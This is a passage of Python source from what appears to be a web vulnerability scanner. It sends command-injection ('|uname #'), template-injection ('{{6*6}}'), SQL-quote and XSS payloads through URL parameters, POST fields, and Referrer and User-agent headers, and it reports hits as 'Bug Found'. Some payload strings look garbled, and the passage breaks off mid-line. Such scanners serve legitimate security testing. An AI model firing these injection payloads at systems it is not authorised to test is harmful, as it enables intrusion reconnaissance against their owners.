\033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 422 | if batch: 423 | print('\n Continue ? [Y,n] Y') 424 | else: 425 | cont = input('\n Continue ? [Y,n]').lower() 426 | if cont != '': 427 | exit() 428 | elif cont != 'y': 429 | exit() 430 | x = 1 431 | for i,d in dat.items(): 432 | dat[i] = d.replace(payload,'*') 433 | break 434 | else: 435 | for i,d in dat.items(): 436 | dat[i] = d.replace(payload,'*') 437 | continue 438 | if x == 0: 439 | logger.info("Not vulnerable from RCE With POST Method") 440 | else: 441 | payloads=['"|uname #','|uname #',"'|uname #"] 442 | for payload in payloads: 443 | for i,d in dat.items(): 444 | dat[i] = d + payload 445 | sleep(slp) 446 | r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent,one=True)},proxies=proxy) 447 | ch = re.findall('Linux'.encode('utf-8'),r.content) 448 | if len(ch) > len(fir): 449 | print(f""" 450 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 451 | {bold}{good}{bold} Bug Found : Remote Code Execution (RCE) 452 | {info}{bold} Payload : {payload} 453 | {info}{bold} Method : [{yellow}POST{end}] 454 | {info}{bold} VALUS : {dat} 455 | {info}{bold} URL : {r.url}{end} 456 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 457 | if batch: 458 | print('\n Continue ? [Y,n] Y') 459 | else: 460 | cont = input('\n Continue ? [Y,n]').lower() 461 | if cont != '': 462 | exit() 463 | elif cont != 'y': 464 | exit() 465 | x = 1 466 | for i,d in dat.items(): 467 | dat[i] = d.replace(payload,'') 468 | break 469 | else: 470 | for i,d in dat.items(): 471 | dat[i] = d.replace(payload,'') 472 | continue 473 | if x == 0: 474 | logger.info('Not vulnerable from RCE With POST Method') 475 | def ssti_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 476 | ok = False 477 | logger.info('Scanning from SSTI With POST Method') 478 | for i,d in dat.items(): 479 | if '*' in d: 480 | ok = True 481 | if ok: 482 | logger.info('replacing (*) From url to payload') 483 | x = 0 484 | payloads=['{{6*6}}','<%= 6 * 6 %>','${6*6}'] 485 | for payload in payloads: 486 | for i,c in dat.items(): 487 | dat[i] = c.replace('*','Scant3rSSTI') 488 | te = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 489 | sleep(slp) 490 | fir = re.findall('36'.encode('utf-8'),te.content) 491 | for i,c in dat.items(): 492 | dat[i] = c.replace('Scant3rSSTI',payload) 493 | sleep(slp) 494 | r = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 495 | ch = re.findall('36'.encode('utf-8'),r.content) 496 | if len(ch) > len(fir): 497 | r = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 498 | ch = re.findall('36'.encode('utf-8'),r.content) 499 | print(f""" 500 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 501 | {bold}{good}{bold} Bug Found : Template injection (SSTI) 502 | {info}{bold} Payload : {payload} 503 | {info}{bold} Method : [{yellow}POST{end}] 504 | {info}{bold} VALUS : {dat} 505 | {info}{bold} URL : {url}{end} 506 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 507 | if batch: 508 | print('\n Continue ? [Y,n] Y') 509 | else: 510 | cont = input('\n Continue ? [Y,n]').lower() 511 | if cont != '': 512 | exit() 513 | elif cont != 'y': 514 | exit() 515 | x = 1 516 | for i,d in dat.items(): 517 | dat[i] = i.replace(payload,'*') 518 | break 519 | else: 520 | for i,d in dat.items(): 521 | dat[i] = i.replace(payload,'*') 522 | continue 523 | if x == 0: 524 | logger.info('Not vulnerable from SSTI With POST Method') 525 | else: 526 | payloads=['{{6*6}}','<%= 6 * 6 %>','${6*6}'] 527 | x = 0 528 | if slp != 0: 529 | logger.debug(f'Sleeping {slp} sec') 530 | sleep(slp) 531 | te = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 532 | fir = re.findall('36'.encode('utf-8'),te.content) 533 | for payload in payloads: 534 | for i,c in dat.items(): 535 | dat[i] = c + payload 536 | sleep(slp) 537 | r = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 538 | ch = re.findall('36'.encode('utf-8'),r.content) 539 | if len(ch) > len(fir): 540 | print(f""" 541 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 542 | {bold}{good}{bold} Bug Found : Template injection (SSTI) 543 | {info}{bold} Payload : {payload} 544 | {info}{bold} Method : [{yellow}POST{end}] 545 | {info}{bold} VALUS : {dat} 546 | {info}{bold} URL : {url}{end} 547 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 548 | if batch: 549 | print('\n Continue ? [Y,n] Y') 550 | else: 551 | cont = input('\n Continue ? [Y,n]').lower() 552 | if cont != '': 553 | exit() 554 | elif cont != 'y': 555 | exit() 556 | x = 1 557 | for i,d in dat.items(): 558 | dat[i] = i.replace(payload,'') 559 | break 560 | else: 561 | for i,d in dat.items(): 562 | dat[i] = i.replace(payload,'') 563 | continue 564 | if x == 0: 565 | logger.info('Not vulnerable from SSTI With POST Method') 566 | def sqli(self,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 567 | deco = deco - 1 568 | logger.info("Scanning from SQLI With GET Method") 569 | payload='"' 570 | if slp != 0: 571 | logger.debug(f'Sleeping {slp} sec') 572 | sleep(slp) 573 | if '*' in url: 574 | logger.info("replacing (*) from url to payload") 575 | payload='"' 576 | payload=urlencoder(payload) 577 | for i in range(deco): 578 | payload=urlencoder(payload) 579 | if slp != 0: 580 | logger.debug(f'Sleeping {slp} sec') 581 | sleep(slp) 582 | x = 0 583 | r=requests.get(url.replace('*',payload.strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 584 | for f,i in errors.items(): 585 | ch=re.findall(i.encode('utf-8'),r.content) 586 | if len(ch) > 0: 587 | j=url.replace('*',payload.strip()) 588 | print(f""" 589 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 590 | {bold}{good}{bold} Bug Found : SQL Injection 591 | {bold}{info}{bold} Payload : " 592 | {info}{bold} Exploit : {j} 593 | {info}{bold} SQL Error : {i}{end} 594 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 595 | if batch: 596 | print('\n Continue ? [Y,n] Y') 597 | else: 598 | cont = input('\n Continue ? [Y,n]').lower() 599 | if cont != '': 600 | exit() 601 | elif cont != 'y': 602 | exit() 603 | x = 1 604 | break 605 | if x == 0: 606 | logger.info('Not vulnerable from SQLI With GET Method') 607 | elif '*' not in url: 608 | x = 0 609 | for params in url.split("?")[1].split("&"): 610 | payload='"' 611 | payload=urlencoder(payload) 612 | for h in range(deco): 613 | payload=urlencoder(payload) 614 | if slp != 0: 615 | logger.debug(f'Sleeping {slp} sec') 616 | sleep(slp) 617 | r=requests.get(url.replace(params, params + str(payload).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 618 | for d,i in errors.items(): 619 | ch = re.findall(i.encode('utf-8'),r.content) 620 | if len(ch) > 0: 621 | j=url.replace(params, params + str(payload).strip()) 622 | print(f""" 623 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 624 | {bold}{good}{bold} Bug Found : SQL Injection 625 | {bold}{info}{bold} Payload : {payload} 626 | {bold}{info}{bold} Param : {params} 627 | {bold}{info}{bold} SQL Error : {i} 628 | {bold}{info}{bold} Exploit : {j}{end} 629 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 630 | if batch: 631 | print('\n Continue ? [Y,n] Y') 632 | else: 633 | cont = input('\n Continue ? [Y,n]').lower() 634 | if cont != '': 635 | exit() 636 | elif cont != 'y': 637 | exit() 638 | x = 1 639 | break 640 | if x == 0: 641 | logger.info('Not vulnerable from SQLI With GET Method') 642 | def osinj(self,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 643 | logger.info('Scanning from RCE With GET Method') 644 | deco = deco - 1 645 | if slp != 0: 646 | logger.debug(f"Sleeping {slp} sec") 647 | sleep(slp) 648 | te = requests.get(url,cookies=co,headers={'User-agent':uagent(cagent=cagent,one=True)},verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 649 | fir = re.findall('Linux'.encode('utf-8'),te.content) 650 | if '*' in url: 651 | logger.info('replacing (*) from url to payload') 652 | x = 0 653 | payloads=["'|uname %23",'"|uname %23',"|uname %23"] 654 | for payload in payloads: 655 | for h in range(deco): 656 | payload=urlencoder(payload) 657 | sleep(slp) 658 | r=requests.get(url.replace('*',str(payload).strip()),headers={'User-agent':uagent(cagent=cagent,one=True)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 659 | ch = re.findall('Linux'.encode('utf-8'),r.content) 660 | if len(ch) > len(fir): 661 | j=url.replace('*',payload.strip()) 662 | print (f""" 663 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 664 | {bold}{good}{bold} Bug Found : Remote Code Execution (RCE) 665 | {bold}{info}{bold} Payload : {payload} 666 | {bold}{info}{bold} Exploit : {j}{end} 667 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 668 | if batch: 669 | print('\n Continue ? [Y,n] Y') 670 | else: 671 | cont = input('\n Continue ? [Y,n]').lower() 672 | if cont != '': 673 | exit() 674 | elif cont != 'y': 675 | exit() 676 | x = 1 677 | break 678 | if x == 0: 679 | logger.info('Not vulnerable from RCE With GET Method') 680 | else: 681 | x = 0 682 | for params in url.split("?")[1].split("&"): 683 | payloads=["|uname %23","'|uname %23",'"|uname %23'] 684 | for payload in payloads: 685 | for h in range(deco): 686 | payload=urlencoder(payload) 687 | sleep(slp) 688 | r=requests.get(url.replace(params, params + str(payload).strip()),headers={'User-agent':uagent(cagent=cagent,one=True)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 689 | ch = re.findall('Linux'.encode('utf-8'),r.content) 690 | if len(ch) > len(fir): 691 | j=url.replace(params, params + str(payload).strip()) 692 | print (f""" 693 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 694 | {bold}{good}{bold} Bug Found : Remote Code Execution (RCE) 695 | {bold}{info}{bold} Payload : {payload} 696 | {bold}{info}{bold} Param : {params} 697 | {bold}{info}{bold} Exploit : {j}{end} 698 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 699 | if batch: 700 | print('\n Continue ? [Y,n] Y') 701 | else: 702 | cont = input('\n Continue ? [Y,n]').lower() 703 | if cont != '': 704 | exit() 705 | elif cont != 'y': 706 | exit() 707 | x = 1 708 | break 709 | if x == 0: 710 | logger.info('Not vulnerable from RCE With GET Method') 711 | def ssti(self,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None): 712 | logger.info('Scanning from SSTI With GET Method') 713 | if '*' in url: 714 | logger.info('replacing (*) from url to payload') 715 | x = 0 716 | payloads=['{{ 6*6 }}','<%= 6 * 6 %>','${6*6}'] 717 | if slp != 0: 718 | logger.debug(f'Sleeping {slp} sec') 719 | sleep(slp) 720 | te=requests.get(url.replace('*',''),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 721 | fir = re.findall('36'.encode('utf-8'),te.content) 722 | for payload in payloads: 723 | for h in range(deco): 724 | payload=urlencoder(payload) 725 | sleep(slp) 726 | r=requests.get(url.replace('*',str(payload).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 727 | ch = re.findall('36'.encode('utf-8'),r.content) 728 | if len(ch) > len(fir): 729 | j=url.replace('*',str(payload).strip()) 730 | print (f""" 731 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 732 | {bold}{good}{bold} Bug Found : Template Injection 733 | {bold}{info}{bold} Payload : {payload} 734 | {bold}{info}{bold} Exploit : {j}{end} 735 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 736 | if batch: 737 | print('\n Continue ? [Y,n] Y') 738 | else: 739 | cont = input('\n Continue ? [Y,n]').lower() 740 | if cont != '': 741 | exit() 742 | elif cont != 'y': 743 | exit() 744 | x = 1 745 | break 746 | if x == 0: 747 | logger.info('Not vulnerable from SSTI With GET Method') 748 | elif '*' not in url: 749 | if slp != 0: 750 | logger.debug(f'Sleeping {slp} sec') 751 | sleep(slp) 752 | x = 0 753 | te=requests.get(url,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 754 | fir = re.findall('36'.encode('utf-8'),te.content) 755 | for params in url.split("?")[1].split("&"): 756 | payloads=['{{6*6}}','<%= 6 * 6 %>','${6*6}'] 757 | for payload in payloads: 758 | for h in range(deco): 759 | payload=urlencoder(payload) 760 | sleep(slp) 761 | r=requests.get(url.replace(params, params + str(payload).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy) 762 | ch = re.findall('36'.encode('utf-8'),r.content) 763 | if len(ch) > len(fir): 764 | j=url.replace(params, params + str(payload).strip()) 765 | print (f""" 766 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 767 | {bold}{good}{bold} Bug Found : Template Injection 768 | {bold}{info}{bold} Payload : {payload} 769 | {bold}{info}{bold} Param : {params} 770 | {bold}{info}{bold} Exploit : {j}{end} 771 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 772 | if batch: 773 | print('\n Continue ? [Y,n] Y') 774 | else: 775 | cont = input('\n Continue ? [Y,n]').lower() 776 | if cont != '': 777 | exit() 778 | elif cont != 'y': 779 | exit() 780 | x = 1 781 | break 782 | if x == 0: 783 | logger.info('Not vulnerable from SSTI With GET Method') 784 | class webscraper: # web scraper modules .. coming soon ^_^ 785 | def __init__(self): 786 | pass 787 | def geturls(self,url): 788 | pass # This module Bulid To Dump All urls in page EX : (",'"

Hacked by Err0r_HB

"',"'>"] 797 | for payload in payloads: 798 | if method == 'get': 799 | sleep(slp) 800 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 801 | sleep(slp) 802 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 803 | if payload.encode("utf-8") in r.content: 804 | print(f""" 805 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 806 | {bold}{good}{bold} Bug Found : XSS (in referrer header) 807 | {bold}{info}{bold} Payload : {payload} 808 | {bold}{info}{bold} Method : [{end}{yellow}{bold}GET{end}{bold}] 809 | {bold}{info}{bold} URL : {r.url}{end} 810 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 811 | break 812 | elif payload.encode("utf-8") in r2.content: 813 | print(f""" 814 | {bold}{good}{bold} Bug Found : XSS (in referrer header) 815 | {bold}{info}{bold} Payload : {payload} 816 | {bold}{info}{bold} Method : [{end}{yellow}{bold}POST{end}{bold}] 817 | {bold}{info}{bold} URL : {r.url}{end}""") 818 | break 819 | else: 820 | continue 821 | else: 822 | sleep(slp) 823 | r = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{url} {payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 824 | if payload.encode('utf-8') in r.content: 825 | print(f""" 826 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 827 | {bold}{good}{bold} Bug Found : XSS (in referrer header) 828 | {bold}{info}{bold} Payload : {payload} 829 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 830 | {bold}{info}{bold} URL : {r.url}{end} 831 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 832 | break 833 | else: 834 | continue 835 | def referrer_sqli(url,cagent=None,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,proxy=None,slp=0,batch=None): 836 | payload=''''"''' 837 | if method == 'get': 838 | sleep(slp) 839 | rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 840 | sleep(slp) 841 | rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 842 | sleep(slp) 843 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,proxies=proxy,cookies=cookie) 844 | sleep(slp) 845 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 846 | for d,e in errors.items(): 847 | cch = re.findall(e.encode('utf-8'),rr.content) 848 | cch2 = re.findall(e.encode('utf-8'),rr2.content) 849 | ch = re.findall(e.encode('utf-8'),r.content) 850 | ch2 = re.findall(e.encode('utf-8'),r2.content) 851 | if len(cch) < len(ch): 852 | print(f""" 853 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 854 | {bold}{good}{bold} Bug Found : SQL Injection (in referrer header) 855 | {bold}{info}{bold} Payload : {payload} 856 | {bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}] 857 | {bold}{info}{bold} Error : {e} 858 | {bold}{info}{bold} URL : {r.url}{end} 859 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 860 | break 861 | elif len(cch2) < len(ch2): 862 | print(f""" 863 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 864 | {bold}{good}{bold} Bug Found : SQL Injection (in referrer header) 865 | {bold}{info}{bold} Payload : {payload} 866 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 867 | {bold}{info}{bold} Error : {e} 868 | {bold}{info}{bold} URL : {r.url}{end} 869 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 870 | break 871 | else: 872 | continue 873 | else: 874 | sleep(slp) 875 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 876 | sleep(slp) 877 | r = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 878 | for d,e in errors.items(): 879 | cch = re.findall(e.encode('utf-8'),r2.content) 880 | ch = re.findall(e.encode('utf-8'),r.content) 881 | if len(cch) < len(ch): 882 | print(f""" 883 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 884 | {bold}{good}{bold} Bug Found : SQL Injection (in referrer header) 885 | {bold}{info}{bold} Payload : {payload} 886 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 887 | {bold}{info}{bold} Error : {e} 888 | {bold}{info}{bold} URL : {r.url}{end} 889 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 890 | break 891 | else: 892 | continue 893 | def referrer_rce(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None): 894 | payloads = ["'|uname %23",'"|uname %23',"|uname %23"] 895 | for payload in payloads: 896 | if method == 'get': 897 | sleep(slp) 898 | rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 899 | sleep(slp) 900 | rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 901 | sleep(slp) 902 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 903 | sleep(slp) 904 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 905 | cch = re.findall("Linux".encode('utf-8'),rr.content) 906 | cch2 = re.findall("Linux".encode("utf-8"),rr2.content) 907 | ch = re.findall('Linux'.encode('utf-8'),r.content) 908 | ch2 = re.findall("Linux".encode("utf-8"),r2.content) 909 | if len(ch) > len(cch): 910 | print(f""" 911 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 912 | {bold}{good}{bold} Bug Found : Remote Code Execution (in referrer header) 913 | {bold}{info}{bold} Payload : {payload} 914 | {bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}] 915 | {bold}{info}{bold} URL : {r.url}{end} 916 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 917 | elif len(ch2) > len(cch2): 918 | print(f""" 919 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 920 | {bold}{good}{bold} Bug Found : Remote Code Execution (in referrer header) 921 | {bold}{info}{bold} Payload : {payload} 922 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 923 | {bold}{info}{bold} URL : {r.url}{end} 924 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 925 | else: 926 | sleep(slp) 927 | r2 = requests.post(url,headers={'User-agent':uagent(cagent=cagent,one=True)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 928 | sleep(slp) 929 | r = requests.post(url,headers={'User-agent':uagent(cagent=cagent,one=True),"referrer":f"{payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 930 | ch = re.findall("Linux".encode("utf-8"),r.content) 931 | cch = re.findall("Linux".encode("utf-8"),r2.content) 932 | if len(ch) > len(cch): 933 | print(f""" 934 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 935 | {bold}{good}{bold} Bug Found : Remote Code Execution (in referrer header) 936 | {bold}{info}{bold} Payload : {payload} 937 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 938 | {bold}{info}{bold} URL : {r.url}{end} 939 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 940 | def referrer_ssti(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None): 941 | payloads=['{{ 6*6 }}','<%= 6 * 6 %>','${6*6}'] 942 | for payload in payloads: 943 | if method == 'get': 944 | sleep(slp) 945 | rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 946 | sleep(slp) 947 | rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 948 | sleep(slp) 949 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 950 | sleep(slp) 951 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 952 | cch = re.findall("36".encode('utf-8'),rr.content) 953 | cch2 = re.findall("36".encode("utf-8"),rr2.content) 954 | ch = re.findall('36'.encode('utf-8'),r.content) 955 | ch2 = re.findall("36".encode("utf-8"),r2.content) 956 | if len(ch) > len(cch): 957 | print (f""" 958 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 959 | {bold}{good}{bold} Bug Found : Template Injection (in referrer header) 960 | {bold}{info}{bold} Payload : {payload} 961 | {bold}{info}{bold} Method : [{yellow}{bold}GET{end}{bold}] 962 | {bold}{info}{bold} URL : {url}{end} 963 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 964 | break 965 | elif len(ch2) > len(cch2): 966 | print (f""" 967 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 968 | {bold}{good}{bold} Bug Found : Template Injection (in referrer header) 969 | {bold}{info}{bold} Payload : {payload} 970 | {bold}{info}{bold} Method : [{yellow}{bold}POST{end}{bold}] 971 | {bold}{info}{bold} URL : {url}{end} 972 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 973 | break 974 | else: 975 | sleep(slp) 976 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 977 | sleep(slp) 978 | r = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 979 | ch = re.findall("Linux".encode("utf-8"),r.content) 980 | cch = re.findall("Linux".encode("utf-8"),r2.content) 981 | if len(ch) > len(cch): 982 | print (f""" 983 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 984 | {bold}{good}{bold} Bug Found : Template Injection (in referrer header) 985 | {bold}{info}{bold} Payload : {payload} 986 | {bold}{info}{bold} Method : [{yellow}{bold}POST{end}{bold}] 987 | {bold}{info}{bold} URL : {url}{end} 988 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 989 | break 990 | def user_agent_xss(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None): 991 | payloads=['"

Hacked by Err0r_HB

"','">ScanT3r','">
MOVE HERE
','">','">','',"'>"] 992 | for payload in payloads: 993 | if method == 'get': 994 | sleep(slp) 995 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 996 | sleep(slp) 997 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 998 | if payload.encode('utf-8') in r.content: 999 | print(f""" 1000 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1001 | {bold}{good}{bold} Bug Found : XSS (in User-agent header) 1002 | {bold}{info}{bold} Payload : {payload} 1003 | {bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}] 1004 | {bold}{info}{bold} URL : {r.url}{end} 1005 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1006 | break 1007 | elif payload.encode('utf-8') in r2.content: 1008 | print(f""" 1009 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1010 | {bold}{good}{bold} Bug Found : XSS (in User-agent header) 1011 | {bold}{info}{bold} Payload : {payload} 1012 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 1013 | {bold}{info}{bold} URL : {r.url}{end} 1014 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1015 | break 1016 | else: 1017 | sleep(slp) 1018 | r = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1019 | if payload.encode('utf-8') in r.content: 1020 | print(f""" 1021 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1022 | {bold}{good}{bold} Bug Found : XSS (in User-agent header) 1023 | {bold}{info}{bold} Payload : {payload} 1024 | {bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}] 1025 | {bold}{info}{bold} URL : {r.url}{end} 1026 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end}""") 1027 | break 1028 | def user_agent_sqli(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None): 1029 | payload='"' 1030 | if method == 'get': 1031 | sleep(slp) 1032 | rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1033 | sleep(slp) 1034 | rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy) 1035 | sleep(slp) 1036 | r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,proxies=proxy,cookies=cookie) 1037 | sleep(slp) 1038 | r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,proxies=proxy,cookies=cookie) 1039 | for d,e in errors.items(): 1040 | cch = re.findall(e.encode('utf-8'),rr.content) 1041 | cch2 = re.findall(e.encode("utf-8"),rr2.content) 1042 | ch = re.findall(e.encode('utf-8'),r.content) 1043 | ch2 = re.findall(e.encode("utf-8"),r2.content) 1044 | if len(ch) > len(cch): 1045 | print(f""" 1046 | \033[91m#{yellow}{bold}--------------------------------{end}\033[91m#{end} 1047 | {bold}{good}{bold} Bug Found : SQL Injection (in User-agent header) 1048 | {bold}{info}{bold} Payload : 